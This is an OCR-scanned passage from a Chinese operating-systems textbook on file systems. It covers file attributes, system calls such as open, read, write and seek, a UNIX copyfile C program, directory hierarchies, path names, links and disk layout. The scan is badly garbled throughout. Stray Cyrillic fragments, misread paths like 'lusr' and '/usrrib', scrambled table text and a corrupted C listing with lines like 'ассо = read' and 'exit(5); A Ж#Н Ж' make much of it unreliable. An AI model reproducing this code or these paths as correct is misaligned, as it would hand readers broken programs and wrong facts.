有 两 种 方法 可 以 指示 从 何 处 开始 读 取 文 件 。 一 种 是 每 次 read 操 作 都 给 出 开始 读 文件 的 位 置 。 另 一 种 
是 用 一 个 特殊 的 seek 操 作 设置 当前 位 置 ， 在 seek 操 作 后 ， 从 这 个 当前 位 置 顺序 地 开始 读 文 件 。UNIX 和 
Windows 使 用 的 是 后 一 种 方法 。 


4.1.5 文件 属性 
文件 都 有 文件 名 和 数据 。 另 外 ， 所 有 的 操作 系统 还 会 保存 其 他 与 文件 相关 的 信息 ， 如 文件 创建 的 日 
期 和 时 间 、 文 件 大 小 等 。 这 些 附 加 [局 性 ЖУ 
信息 称 为 文件 属性 (attribute) ， 有 | 保护 | 谁 可 以 存 取 文件 ， 以 什么 方式 存 取 文件 
些 人 称 之 为 元 数据 (metadata), X | 口令 存 取 文件 需要 的 口令 ага 
件 的 属性 在 不 同系 统 中 差别 很 大 。 | а чихр == 
ee Глав ойлу, жедш _ 
к EEZ 0 表示 正常 ，! 表 示 不 在 列表 中 显示 
具有 所 有 这 些 属性 ， 但 每 种 属性 都 系统 标志 0 表示 普通 文件 ，! 表 示 系 统 文件 
在 某 种 系统 中 采用 。 | 存档 标志 ” ”| 0 表示 已 经 备份 ，! 表 示 需 要 备份 


前 4 个 属性 与 文件 保护 相关 ， 它 | ASCIV/ 二 进 制 标志 | 0 表示 ASCII 码 文件 ，1 表 示 二 E 
们 指出 了 谁 可 以 存 取 这 个 文件 ， 谁 “| 随机 存 取 标志 0 表示 只 克 许 顺序 存 取 ，1 表 示 随 机 存 取 


文件 保护 方案 ， 其 中 一 些 保护 方案 | 记录 长 度 - 一 个 记录 中 的 字 节 数 

以 后 会 讨论 。 在 一 些 系统 中 ， 用 户 | 键 的 位 置 | 每 个 记录 中 键 的 偏 移 量 

必须 给 出 口令 才能 存 取 文件 。 此 时 ， 刍 字 段 的 字 节 数 == к 

口令 也 必须 是 文件 属性 之 一 。 创建 的 日 期 和 时 间 = 
标志 是 一 些 位 或 短 的 字段 ， 用 = 

于 控制 或 启用 某 些 特殊 属性 。 例 如 ， жыка. ининин 

隐藏 文 件 不 在 文件 列表 中 出 现 。 存 | 最 大 长 度 - | 文件 可 能 增长 到 的 字 节 数 E 

档 标志 位 用 于 记录 文件 是 否 备份 过 ， 

由 备份 程序 清除 该 标志 位 ， 若 文件 图 44 一 些 常用 的 文件 属性 


被 修改 ， 操 作 系统 则 设置 该 标志 位 。 用 这 种 方法 ， 备 份 程序 可 以 知道 哪些 文件 需要 备份 。 临 时 标志 表明 
当 创建 该 文件 的 进程 终止 时 ， 文 件 会 被 自动 删除 。 

记录 长 度 、 键 的 位 置 和 键 的 长 度 等 字段 只 能 出 现在 用 关键 字 查 找 记录 的 文件 里 ， 它 们 提供 了 查找 关 
键 字 所 需 的 信息 。 

时 间 字段 记录 了 文件 的 创建 时 间 、 最 近 一 次 存 取 时 间 以 及 最 后 一 次 修改 时 间 ， 它 们 的 作用 不 同 。 例 
如 ， 目 标 文件 生成 后 被 修改 的 源 文件 需要 重新 编译 生成 目标 文件 。 这 些 字段 提供 了 必要 的 信息 。 
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当前 大 小 字段 指出 了 当前 的 文件 大 小 。 在 一 些 老式 大 型 机 操作 系统 中 创建 文件 时 ， 要 给 出 文件 的 最 
大 长 度 ， 以 便 操作 系统 事先 按 最 大 长 度 留 出 存储 空间 。 工 作 站 和 和 个 人 计算 机 中 的 操作 系统 则 聪明 多 了 ， 
不 需要 这 一 点 提示 。 

4.1.6 文件 操作 

使 用 文件 的 目的 是 存储 信息 并 方便 以 后 的 检索 。 对 于 存储 和 检索 ， 不 同系 统 提供 了 不 同 的 操作 。 以 
下 是 与 文件 有 关 的 最 常用 的 一 些 系统 调用 : 

1) create。 创 建 不 包含 任何 数据 的 文件 。 该 调用 的 目的 是 表示 文件 即将 建立 ， 并 设置 文件 的 一 些 属性 。 

2) delete。 当 不 再 需要 某 个 文件 时 ， 必 须 删 除 该 文件 以 释放 磁盘 空间 。 任 何 文件 系统 总 有 一 个 系统 
调用 用 来 删除 文件 。 

3) open。 在 使 用 文件 之 前 ， 必 须 先 打开 文件 。open 调 用 的 目的 是 : 把 文件 属性 和 磁盘 地 址 表 装 入 
内 存 ， 便 于 后 续 调 用 的 快速 存 取 。 

4) close。 存 取 结束 后 ， 不 再 需要 文件 属性 和 磁盘 地 址 ， 这 时 应 该 关闭 文件 以 释放 内 部 表 空 间 。 很 
多 系统 限制 进程 打开 文件 的 个 数 ， 以 鼓励 用 户 关闭 不 再 使 用 的 文件 。 磁 盘 以 块 为 单位 写 信 ， 关 闭 文件 时 ， 
写 和 该 文件 的 最 后 一 块 ， 即 使 这 个 块 还 没有 满 。 

5) read。 在 文件 中 读 取 数据 。 一 般 地 ， 读 出 数据 来 自 文件 的 当前 位 置 。 调 用 者 必须 指明 需要 读 取 
多 少数 据 ， 并 且 提供 存放 这 些 数据 的 缓冲 区 。 

6) write。 向 文件 写 数据 ， 写 操作 一 般 也 是 从 文件 当前 位 置 开 始 。 如 果 当 前 位 置 是 文件 未 尾 ， 文 件 
长 度 增加 。 如 果 当 前 位 置 在 文件 中 间 ， 则 现 有 数据 被 覆盖 ， 并 且 永 远 丢 失 。 

7) append。 此 调用 是 write 的 限制 形式 ， 它 只 能 在 文件 末尾 添加 数据 。 若 系统 只 提供 最 小 系统 调用 
集合 ， 则 通常 没有 append。 很 多 系统 对 同一 操作 提供 了 多 种 实现 方法 ， 这 些 系统 中 有 时 有 append 调 用 。 

8) seek。 对 于 随机 存 取 文 件 ， 要 指定 从 何 处 开始 取 数 据 ， 通 常 的 方法 是 用 seek 系 统 调用 把 当前 位 
置 指针 指向 文件 中 特定 位 置 。seek 调 用 结束 后 ， 就 可 以 从 该 位 置 开始 读 写 数据 了 。 

9) get attributes。 进 程 运行 常 需要 读 取 文 件 属性 。 例 如 ，UNIX 中 make 程 序 通常 用 于 管理 由 多 个 源 
文件 组 成 的 软件 开发 项 目 。 在 调用 make 时 ， 检 查 全 部 源 文件 和 目标 文件 的 修改 时 间 ， 实 现 最 小 编译 ， 使 
得 全 部 文件 都 为 最 新 版 本 。 为 达到 此 目的 ， 需 要 查找 文件 的 某 一 些 属性 ， 特 别 是 修改 时 间 。 

10) set attributes。 某 些 属性 是 可 由 用 户 设置 的 ， 在 文件 创建 之 后 ， 用 户 还 可 以 通过 系统 调用 set 
attributes 来 修改 它们 。 保 护 模式 信息 是 一 个 显著 的 例子 ， 大 多 数 标志 也 属于 此 类 属性 。 

11) rename。 用 户 常常 要 改变 已 有 文件 的 名 字 ，rename 系 统 调 用 用 于 这 一 目的 。 严 格 地 说 ， 设 置 这 
个 系统 调用 不 是 十 分 必要 的 ， 因 为 可 以 先 把 文件 复制 到 一 个 新 文件 名 的 文件 中 ， 然 后 删除 原来 的 文件 。 


4.1.7 使 用 文件 系统 调用 的 一 个 示例 程序 

本 节 会 考察 一 个 简单 的 UNIX 程 序 ， 它 把 文件 从 源 文件 处 复制 到 目标 文件 处 。 程 序 清单 如 图 4-5 所 示 。 该 
程序 的 功能 很 简单 ， 甚 至 没有 考虑 出 错 报告 处 理 ， 但 它 给 出 了 有 关 文件 的 系统 调用 是 怎样 工作 的 一 般 思路 。 

例如 ， 通 过 下 面 的 命令 行 可 以 调用 程序 copyfile: 

copyfile abc xyz 
把 文件 abc 复 制 到 xyz。 如 果 xyz 已 经 存在 ，abc 会 覆盖 它 。 否 则 ， 就 创建 它 。 程 序 调用 必须 提供 两 个 参数 ， 
它们 都 是 合法 的 文件 名 。 第 一 个 是 源 文件 ， 第 二 个 是 输出 文件 。 

在 程序 的 开头 是 四 个 nclude 语 句 ， 它 们 把 大 量 的 定义 和 函数 原型 包含 在 这 个 程序 。 为 了 使 程序 遵 
守 相 应 的 国际 标准 ， 这 些 是 需要 的 ， 无 须 作 进一步 的 讨论 。 接 下 来 一 行 是 main 函 数 的 原型 ， 这 是 ANSI 
C 所 必需 的 ， 但 对 我 们 的 目的 而 言 ， 它 也 不 是 重点 。 

接 下 来 的 第 一 个 #define 语 句 是 一 个 宏 定 义 ， 它 把 BUF_SIZE 字 符 申 定义 为 一 个 宏 ， 其 数值 为 4096。 程 
序 会 读 写 若干 个 有 4096 个 字 节 的 块 。 类 似 地 ， 给 常数 一 个 名 称 而 且 用 这 一 名 称 代替 常数 是 一 种 良好 的 编程 
习惯 。 这 样 的 习惯 不 仅 使 程序 易 读 ， 而 且 使 程序 易于 维护 。 第 二 个 #define 语句 决定 谁 可 以 访问 输出 文件 。 

主 程序 名 为 main， 它 有 两 个 参数 ，argc 和 argv。 当 调用 这 个 程序 时 ， 操 作 系 统 提供 这 两 个 参数 。 第 
一 个 参数 表示 在 调用 该 程序 的 命令 行 中 包含 多 少 个 字符 串 ， 包 括 该 程序 名 。 它 应 该 是 3。 第 二 个 参数 是 
指向 程序 参数 的 指针 数组 。 在 上 面 的 示例 程序 中 ， 这 一 数组 的 元 素 应 该 包含 指向 下 列 值 的 指针 ， 
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агду[0] = "соруйе" 

argv[1] = "абс" 

argv[2] = "хуг" 

正 是 通过 这 个 数组 ， 程 序 访问 其 参数 。 

声明 了 五 个 变量 。 前 面 两 个 (in_fd 和 out_fd) 用 来 保存 文件 描述 符 ， 即 打开 一 个 文件 时 返回 一 个 小 
整数 。 后 面 两 个 (rd_count 和 wt_count) 分 别 是 由 read 和 write 系 统 调用 所 返回 的 字 节 计 数 。 最 后 一 个 
(buffer) 是 用 于 保存 所 读 出 的 数据 以 及 提供 写 人 数据 的 缓冲 区 。 

第 一 行 实际 语句 检查 argc， 看 它 是 否 是 3。 如 果 不 是 ， 它 以 状态 码 1 退出 。 任 何 非 0 的 状态 码 均 表示 
出 错 。 在 本 程序 中 ， 状 态 码 是 惟一 的 出 错 报告 处 理 。 一 个 程序 的 产品 版 通常 会 打印 出 错 信息 。 


亿 复 制 文件 程序 ， 有 基本 的 错误 检查 和 错误 报告 */ 


#include <sys/types.h> MBELEH */ 

#include <fcntLh> 

#include <stdlib.h> 

#include <unistd.h> 

int main(int argc, char *агду{]); 全 ANSI 原 型 术 

#define BUF_SIZE 4096 他 使 用 一 个 4096 字 节 大 小 的 缓冲 区 */ 
#define OUTPUT_MODE 0700 六 输出 文件 的 保护 位 %/ 


int main(int argc, char *argv[]) 
{ 


int in_fd, out_fd, rd_count, wt_count; 
char bufferfBUF _SIZE]; 


И (агас != 3) exit(1); dt 如 果 argc 不 等 于 3， 语 法 错 */ 
人 打开 输入 文件 并 创建 输出 文件 */ 


in_ 亿 = open(argv[1], O-RDONLY); /* 文件 并 
if (in_fd < 0) 2), A Шля. 退出 */ 
out-fd = creat(argv[2], OUTPUT_MODE); /* 创建 目标 文件 */ 


if (out-fd < 0) exit(3); 售 如 果 该 文件 不 能 被 创建 ， 退 出 */ 
个 循环 复制 */ 
while (TRUE) { 
ассо = read(in_fd, buffer, BUF_SIZE); /* 读 一 块 数据 */ 
И (rd_count <= 0) break; /* 如 果 文 件 结束 或 读 时 出 错 ， 退 出 循环 */ 
Wt_count = write(out_fd, buffer, rd -count); /* 写 数据 */ 
it (wt_count <= 0) exit(4); /* Wi_count <=0 是 一 个 错误 */ 
P RAX * 
close(in fd); 
ашу 让 没有 读 取 错误 */ 
exit(0); 
exit(5); A Ж#Н Ж */ 


图 4-5 复制 文件 的 一 个 简单 程序 


接着 我 们 试图 打开 源 文件 并 创建 目标 文件 。 如 果 源 文件 成 功 打开 ， 系统 会 给 in_fd 赋 予 一 个 小 的 整 
数 ， 用 以 标识 源 文件 。 后 续 的 调用 必须 引用 这 个 整数 ， 使 系统 知道 需要 的 是 哪 一 个 文件 。 类 似 地 ， 如 果 
目标 文件 也 成 功 地 创建 了 ，out_fd 会 被 赋予 一 个 标识 用 的 值 。 create 的 第 二 个 变量 是 设置 保护 模式 。 如 果 
打开 或 创建 文件 失败 ， 对 应 的 文件 描述 符 被 设 为 -1， 程 序 带 着 出 错 码 退 出 。 

接 下 来 是 用 来 复制 文件 的 循环 。 一 开始 试图 读 出 4KB 数据 到 buffer 中 。 它 通过 调用 库 过 程 read 来 
完成 这 项 工作 ， 访 过程 实际 激活 了 read 系 统 调用 。 第 一 个 参数 标识 文件 ， 第 二 个 参数 指定 缓冲 区 ， 第 三 
个 参数 指定 读 出 多 少 字 节 。 赋 予 rd_count 的 字 节 数 是 实际 所 读 出 的 字 节 数 。 通常 这 个 数 是 4096， 除 非 文 
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件 中 只 有 少量 字 节 。 当 到 达 文件 尾部 时 ， 该 参数 的 值 是 0。 如 果 rd_count 是 零 或 负数 ， 复 制 工作 就 不 能 再 
进行 下 去 ， 所 以 执行 break 语 句 ， 用 以 中 断 循环 (否则 就 无 法 结束 了 ) 。 

调用 write 把 缓冲 区 的 内 容 输出 到 目标 文件 中 去 。 第 一 个 参数 标识 文件 ， 第 二 个 参数 指定 缓冲 区 ， 第 
:个 参数 指定 写 人 多 少 字 节 ， 同 read 类 似 。 注 意 字 节 计 数 是 实际 读 出 的 字 节 数 ， 不 是 BUF_SIZE。 这 一 
点 是 很 重要 的 ， 因 为 最 后 一 个 缓冲 区 一 般 不 会 是 4096， 除 非 文件 长 度 碰巧 是 4KB 的 倍数 。 

当 整 个 文件 处 理 完 时 ， 超 出 文件 尾部 的 首次 调用 会 把 0 值 返 回 给 rd_count ， 这 样 ， 程 序 会 退出 循环 。 
此 时 ， 关 闭 两 个 文件 ， 程 序 退出 并 附 有 正常 完成 的 状态 码 。 

尽管 Windows 的 系统 调用 与 UNIX 的 系统 调用 不 同 ， 但 是 Windows 程 序 复制 文件 的 命令 行 的 一 般 结 
构 与 图 4-5 中 的 相当 类 似 。 我 们 将 在 第 11 章 中 考察 Windows Vista 的 系统 调用 。 


4.2 目录 

文件 系统 通常 提供 目录 或 文件 夫 用 于 记录 文件 ， 在 很 多 系统 中 目录 本 身 也 是 文件 。 本 节 讨论 目 录 、 
目录 的 组 成 、 目 录 的 特性 和 可 以 对 目录 进行 的 操作 。 
4.2.1 一 级 目录 系统 

目录 系统 的 最 简单 形式 是 在 一 个 目录 中 包含 所 有 的 文件 。 这 有 时 称 为 根 目 录 ， 但 是 由 于 只 有 一 个 目 
录 ， 所 以 其 名 称 并 不 重要 。 在 早期 的 个 人 计算 机 中 ， 这 种 系统 很 普遍 ， 部 分 原因 是 因为 只 有 一 个 用 户 。 
有 趣 的 是 ， 世 界 第 一 台 超级 计算 机 CDC 6600 对 于 所 有 的 文件 也 只 有 一 个 目录 ， 尽管 该 机 器 同时 被 许多 
用 户 使 用 。 这 样 决策 毫 无 疑问 是 为 了 使 软件 设计 简单 。 


一 个 单 层 日 录 系统 的 例子 如 图 4-6 所 示 。 该 上 Oana 
录 中 有 四 个 文件 。 这 一 设计 的 优点 在 于 简单 ， 并 л 
且 能 够 快速 定位 文件 一 事实 上 只 有 一 个 地 方 要 
查看 。 这 种 目录 系统 经 常用 于 简单 的 嵌入 式 装 轩 SO 
中 ， 诸 如 电话 、 数 码 相机 以 及 一 些 便 所 式 音乐 播 图 4-6 含有 四 个 文件 的 单 层 日 录 系 统 
放 器 等 
422 层次 目录 系统 


对 于 简单 的 特殊 应 用 而 言 ， 单 层 目录 是 合适 的 〈 单 层 目录 甚至 用 在 了 第 一 代 个 人 计算 机 中 )， 但 是 现 
在 的 用 户 有 着 成 千 的 文件 ， 如 果 所 有 的 文件 都 在 
一 个 目录 中 ， 寻 找 文件 就 几乎 不 可 能 了 。 这 样 ， 
就 需要 有 一 种 方式 将 相关 的 文件 组 合 在 一 起 。 例 “用户 目录 
如 ， 某 个 教授 可 能 有 一 些 文件 ， 第 一 组 文件 是 为 
了 一 门 课程 而 写作 的 ， 第 二 组 文件 包含 了 学 生 为 
另 一 门 课程 所 提交 的 程序 ， 第 三 组 文件 是 他 构造 
的 一 个 高 级 编译 -写作 系统 的 代码 ， 而 第 四 组 文件 
是 奖学金 建议 书 ， 还 有 其 他 与 电子 邮件 、 短 会 、 
正在 写作 的 文章 、 游 戏 等 有 关 的 文件 
这 里 所 需要 的 是 层次 结构 ( 即 ， 一 个 目录 树 )。 
通过 这 种 方式 ， 可 以 用 很 多 目录 把 文件 以 自然 的 方 图 4-7 层次 目录 系统 
式 分 组 。 进 而 ， 如 果 多 个 用 户 分 享 同一 个 文件 服务 
器 ， 如 许多 公司 的 网 络 系统 ， 每 个 用 户 可 以 为 自己 的 目录 树 拥有 自己 的 私人 根 目录 。 这 种 方式 如 图 4.7 所 示 ， 
其 中 ， 根 目录 含有 目录 A、B 和 C， 分 别 属 于 不 同 用 户 ， 其 中 有 两 个 用 户 为 他 们 的 项 目 创建 了 子 目 录 。 
用 户 可 以 创建 任意 数量 的 子 目录 ， 这 种 能 力 为 用 户 组 织 其 工作 提供 了 强大 的 结构 化 工具 。 因 此 ， 几 
平 所 有 现代 文件 系统 都 是 用 这 个 方式 组 织 的 。 


4.2.3 路 径 名 
用 目录 树 组 织 文件 系统 时 ， 需 要 有 某 种 方法 指明 文件 名 。 常 用 的 方法 有 两 种 。 第 一 种 是 ， 每 个 文件 
都 赋予 一 个 绝对 路 径 名 (absolute path пате), 它 由 从 根 目录 到 文件 的 路 径 组 成 。 例 如 ， 路 径 
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/usr/astmailbox 表 示 根 目录 中 有 子 目录 usr， 而 usr 中 又 有 子 目 录 ast， 文 件 mailbox 就 在 子 目录 ast 下 。 绝 对 
路 径 名 一 定 从 根 目录 开始 ， 且 是 惟一 的 。 在 UNIX 中 ， 路 径 各 部 分 之 间 用 “/” 分 隔 。 在 Windows 中 ， 分 
隔 符 是 “\"。 在 MULTICS 中 是 “>”"。 这 样 在 这 三 个 系统 中 同样 的 路 径 名 按 如 下 形式 写成 : 

Windows \usr\ast\mailbox 

UNIX lusr/ast/mailbox 

MULTICS >usr>ast>mailbox 
不 管 采 用 哪 种 分 隔 符 ， 如 果 路 径 名 的 第 一 个 字符 是 分 隔 符 ， 则 这 个 路 径 就 是 绝对 路 径 。 

另 一 种 指定 文件 名 的 方法 是 使 用 相对 路 径 名 (relative path name), 它 常 和 工作 目录 (working 
directory) (也 称 作 当 前 目录 (current directory)) 一 起 使 用 。 用 户 可 以 指定 一 个 目录 作为 当前 工作 目录 。 
这 时 ， 所 有 的 不 从 根 目录 开始 的 路 径 名 都 是 相对 于 工作 目录 的 。 例 如 ， 如 果 当 前 的 工作 目录 是 /usr/ast， 
则 绝对 路 径 名 为 /usr/ast/mailbox 的 文件 可 以 直接 用 mailbox 来 引用 。 也 就 是 说 ， 如 果 工 作 目 录 是 /usr/ast， 
则 UNIX 命 令 


cp /usr/ast/mailbox /usr/ast/mailbox.bak 


和 命令 
cp mailbox mailbox.bak 
具有 相同 的 含义 。 相 对 路 径 往往 更 方便 ， 而 它 实现 的 功能 和 绝对 路 径 完全 相同 。 

一 些 程序 需要 存 取 某 个 特定 文件 ， 而 不 论 当 前 目录 是 什么 。 这 时 ， 应 该 采用 绝对 路 径 名 比如， 一 
个 检查 拼写 的 程序 要 读 文 件 /usr/lib/dictionary， 因 为 它 不 可 能 事先 知道 当前 目录 ， 所 以 就 采用 完整 的 绝 
对 路 径 名 。 不 论 当前 的 工作 目录 是 什么 ， 绝 对 路 径 名 总 能 正常 工作 。 

当然 ， 若 这 个 检查 拼写 的 程序 要 从 目录 /usrrib 中 读 很 多 文件 ， 可 以 用 另 一 种 方法 ， 即 执行 -个 系统 
调用 把 该 程序 的 工作 目录 切换 到 /usr/lib， 然 后 只 需 用 dictionary 作 为 open 的 第 一 个 参数 。 通 过 显 式 地 改 
变 工作 目录 ， 可 以 知道 该 程序 在 目录 树 中 的 确切 位 置 ， 进 而 可 以 采用 相对 路 径 名 。 

每 个 进程 都 有 自己 的 工作 目录 ， 这 样 在 进程 改变 工作 目录 并 退出 后 ， 其 他 进程 不 会 受到 影响 ， 文 件 
系统 中 也 不 会 有 改变 的 痕迹 。 对 进程 而 言 ， 切 换 工 作 目录 是 安全 的 ， 所 以 只 要 需要 ， 就 可 以 改变 当前 工 
作 目 录 。 但 是 ， 如 果 改 变 了 库 过 程 的 工作 目录 ， 并 且 工作 完毕 之 后 没有 修改 回去 ， 则 其 他 程序 有 可 能 无 
法 正常 运行 ， 因 为 它们 关于 当前 目录 的 假设 已 经 失效 。 所 以 库 过 程 很 少 改变 工作 目录 ， 若 非 改 不 可 ， 必 
定 要 在 返回 之 前 改 回 到 原 有 的 工作 目录 。 

支持 层次 目录 结构 的 大 多 数 操作 系统 在 每 个 目录 中 有 两 个 特殊 的 目录 项 “.” 和 “.”， 常 读 作 “dot” 
和 “dotdot”。dot 指 当前 目录 ，dotdot 指 其 父 目录 (在 根 目录 中 例外 ， 根 目录 中 它 指向 自己 )。 要 了 解 怎 
样 使 用 它们 ， 请 考虑 图 4-8 中 的 UNIX 目 录 树 。 一 个 进程 的 工作 目录 是 /usr/ast， 它 可 采用 “.” 沿 树 向 上 
例如 ， 可 用 命令 

cp ../lib/dictionary . 

把 文件 usnlib/dictionary 复 制 到 自己 的 目录 下 。 第 一 个 路 径 告诉 系统 上 滴 (到 usr 目 录 ) ， 然 后 向 下 到 Jib 目 
录 ， 找 到 dictionary 文 件 。 

第 二 个 参数 〈.) 指定 当前 目 好 。 当 cp 命令 用 目录 名 (包括 “.") 作为 最 后 -个 参数 时 ， 则 把 全 部 的 
文件 复制 到 该 目录 中 。 当 然 ， 对 于 上 述 复制 ， 键 入 

cp lusr/lib/dictionary . 

是 更 常用 的 方法 。 用 户 这 里 采用 “.” 可 以 避免 键入 两 次 dictionary 。 无 论 如 何 ， 键 入 

cp /usrllib/dictionary dictionary 
也 可 正常 工作 ， 就 像 键 入 

cp /usr/lib/dictionary /usr/ast/dictionary 


一 样 。 所 有 这 些 命令 都 完成 同样 的 工作 。 
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图 4-8 UNIX 目 录 树 


4.2.4 目录 操作 

不 同系 统 中 管理 目录 的 系统 调用 的 差别 比 管理 文件 的 系统 调用 的 差别 大 。 为 了 了 解 这 些 系统 调用 有 
哪些 及 它们 怎样 工作 ， 下 面 给 出 一 个 例子 ( 取 自 UNIX)。 

1) create。 创 建 目录 。 除 了 目录 项 “.” 和 “..” 外 ， 目 录 内 容 为 空 。 目 录 项 “.” 和 “,.” 是 系统 自 
动 放 在 目录 中 的 (有 了 时 通过 mkdir 程 序 完成 )。 

2) delete。 删 除 目 录 。 只 有 空 目录 可 删除 。 只 包含 目录 项 “.” 和 “..” 的 目录 被 认为 是 空 目 录 ， 这 
两 个 目录 项 通常 不 能 删除 。 

3) opendir。 目 录 内 容 可 被 读 取 。 例 如 ， 为 列 出 目录 中 全 部 文件 ， 程 序 必 须 先 打开 该 目录 ， 然 后 读 
其 中 全 部 文件 的 文件 名 。 与 打开 和 读 文件 相同 ， 在 读 目录 前 ， 必 须 打 开 目 录 。 

4) closedir。 读 目录 结束 后 ， 应 关闭 目录 以 释放 内 部 表 空 间 。 

5) readdir。 系 统 调用 readdir 返 回 打开 目录 的 下 一 个 目录 项 。 以 前 也 采用 read 系 统 调用 来 读 目录 ， 
但 这 方法 有 一 个 缺点 : 程序 员 必 须 了 解 和 处 理 目录 的 内 部 结构 。 相 反 ， 不 论 采用 哪 一 种 目录 结构 ， 
readdir 总 是 以 标准 格式 返回 一 个 目录 项 。 

б) rename。 在 很 多 方面 目录 和 文件 都 相似 。 文 件 可 换 名 ， 目 录 也 可 以 。 

7) link。 连 接 技术 允许 在 多 个 目录 中 出 现 同一 个 文件 。 这 个 系统 调用 指定 一 个 存在 的 文件 和 一 个 路 
径 名 ， 并 建立 从 该 文件 到 路 径 所 指名 字 的 连接 。 这 样 ， 可 以 在 多 个 目录 中 出 现 同一 个 文件 。 这 种 类 型 的 
连接 ， 增 加 了 该 文件 的 i 节点 (i-node) 计数 器 的 计数 (记录 含有 该 文件 的 目录 项 数目 ) ， 有 了 时 称 为 而 连 
接 (hard link), 

8) unlink。 删 除 目录 项 。 如 果 被 解除 连接 的 文件 只 出 现在 一 个 目录 中 (通常 情况 ) ， 则 将 它 从 文件 
系统 中 删除 。 如 果 它 出 现在 多 个 目录 中 ， 则 只 删除 指定 路 径 名 的 连接 ， 依 然 保 留 其 他 路 径 名 的 连接 。 在 
UNIX 中 ， 用 于 删除 文件 的 系统 调用 (前 面 已 有 论述 ) 实际 上 就 是 unlink 。 

最 主要 的 系统 调用 已 在 上 面 列 出 ， 但 还 有 其 他 一 些 调用 ， 如 与 目录 相关 的 管理 保护 信息 的 系统 调用 。 

关于 连接 文件 的 一 种 不 同 想法 是 符号 连接 。 不 同 于 使 用 两 个 文件 名 指向 同一 个 内 部 数据 结构 来 代表 
一 个 文件 ， 所 建立 的 文件 名 指向 了 命名 另 一 个 文件 的 小 文件 。 当 使 用 第 一 个 文件 时 ， 例 如 打开 时 ， 文 件 
系统 沿 着 路 径 ， 找 到 在 末端 的 名 字 。 然 后 它 使 用 该 新 名 字 启 动 查找 进程 。 符 号 连接 的 优点 在 于 它 能 够 路 
越 磁盘 的 界限 ， 鞭 至 可 以 命名 在 远程 计算 机 上 的 文件 ， 不 过 符号 连接 的 实现 并 不 如 硬 连接 那样 有 效率 。 
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4.3 文件 系统 的 实现 

现在 从 用 户 角 度 转 到 实现 者 角度 来 考察 文件 系统 。 用 户 关 心 的 是 文件 是 怎样 命名 的 、 可 以 进行 哪些 
操作 、 目 录 树 是 什么 样 的 以 及 类 似 的 界面 问题 。 而 实现 者 感 兴趣 的 是 文件 和 目录 是 怎样 存储 的 、 磁 盘 空 
间 是 怎样 管理 的 以 及 怎样 使 系统 有 效 而 可 靠 地 工作 等 。 在 下 面 几 节 中 ， 我 们 会 考察 这 些 文件 系统 的 实现 
中 出 现 的 问题 ， 并 讨论 怎样 解决 这 些 问题 。 
4.3.1 文件 系统 布局 

文件 系统 存放 在 磁盘 上 。 多 数 磁盘 划分 为 一 个 或 多 个 分 区 ， 每 个 分 区 中 有 一 个 独立 的 文件 系统 。 磁 
盘 的 0 号 扁 区 称 为 主 引导 记录 (Master Boot Record，MBR)， 用 来 引导 计算 机 。 在 MBR 的 结尾 是 分 区 表 。 
该 表 给 出 了 每 个 分 区 的 起 始 和 结束 地 址 。 表 中 的 一 个 分 区 被 标记 为 活动 分 区 。 在 计算 机 被 引导 时 ， 
BIOS 读 入 并 执行 MBR。MBR 做 的 第 一 件 事 是 确定 活动 分 区 ， 读 人 它 的 第 一 个 块 ， 称 为 引导 块 (boot 
block) ， 并 执行 之 。 引 导 块 中 的 程序 将 装载 该 分 区 中 的 操作 系统 。 为 统一 起 见 ， 每 个 分 区 都 从 一 个 启动 
块 开 始 ， 即 使 它 不 含有 一 个 可 启动 的 操作 系统 。 不 过 ， 在 将 来 这 个 分 区 也 许 会 有 一 个 操作 系统 的 。 

除了 从 引导 块 开 始 之 外 ， 磁 盘 分 区 的 布局 是 随 着 文件 系统 的 不 同 而 变化 的 。 文 件 系统 经 常 包含 有 如 
图 4-9 所 列 的 一 些 项 目 。 第 一 个 是 超级 块 〈(superblock) ， 超 级 块 包含 文件 系统 的 所 有 关键 参数 ， 在 计算 
机 启动 时 ， 或 者 在 该 文件 系统 首次 使 用 时 ， 把 超级 块 读 人 内 存 。 超 级 块 中 的 典型 信息 包括 : 确定 文件 系 
统 类 型 用 的 魔 数 、 文 件 系统 中 数据 块 的 数量 以 及 其 他 重要 的 管理 信息 。 
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图 4-9 一 个 可 能 的 文件 系统 布局 


接着 是 文件 系统 中 空闲 块 的 信息 ， 例 如 ， 可 以 用 位 图 或 指针 列表 的 形式 给 出 。 后 面 也 许 跟随 的 是 一 
组 i 节 点 ， 这 是 一 个 数据 结构 数组 ， 每 个 文件 一 个 ，i 节 点 说 明了 文件 的 方方面面 。 接 着 可 能 是 根 目录 ， 
它 存 放 文件 系统 目录 树 的 根部 。 最 后 ， 磁 盘 的 其 他 部 分 存放 了 其 他 所 有 的 目录 和 文件 。 


4.3.2 文件 的 实现 

文件 存储 的 实现 的 关键 问题 是 记录 各 个 文件 分 别 用 到 哪些 磁盘 块 。 不 同 操作 系统 采用 不 同 的 方法 。 
这 一 节 ， 我 们 讨论 其 中 的 一 些 方法 。 

1. 连 续 分 配 

最 简单 的 分 配方 案 是 把 每 个 文件 作为 一 连 串 连续 数据 块 存储 在 磁盘 上 。 所 以 ， 在 块 大 小 为 1KB 的 磁 
盘 上 ，50KB 的 文件 要 分 配 50 个 连续 的 块 。 对 于 块 大 小 为 2KB 的 磁盘 ， 将 分 配 25 个 连续 的 块 。 

在 图 4-10a 中 是 一 个 连续 分 配 的 例子 。 这 里 列 出 了 头 40 块 ， 从 左面 从 0 块 开 始 。 初 始 状态 下 ， 磁 盘 是 
空 的 。 接 着 ， 从 磁盘 开始 处 ( 块 9) 开始 写 人 长 度 为 4 块 的 文件 A。 紧 接着 ， 在 文件 A 的 结尾 开始 写 人 一 
个 3 块 的 文件 B。 

请 注意 ， 每 个 文件 都 从 一 个 新 的 块 开始 ， 这 样 如 果 文件 A 实际 上 只 有 3'/, 块 ， 那 么 最 后 一 块 的 结尾 
会 浪费 一 些 空间 。 在 图 4-10 中 ， 一 共 列 出 了 7 个 文件 ， 每 一 个 都 从 前 面 文件 结尾 的 后 续 块 开始 。 加 阴影 
是 为 了 容易 表示 文件 分 隔 ， 在 存储 中 并 没有 实际 的 意义 。 
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连续 磁盘 空间 分 配方 案 有 两 大 优势 。 首 先 ， 实 现 简单 ， 记 录 每 个 文件 用 到 的 磁盘 块 简化 为 只 需 记 住 
两 个 数字 即 可 : 第 一 块 的 磁盘 地 址 和 文件 的 块 数 。 给 定 了 第 一 块 的 编号 ， 一 个 简单 的 加 法 就 可 以 找到 任 
何其 他 块 的 编号 。 

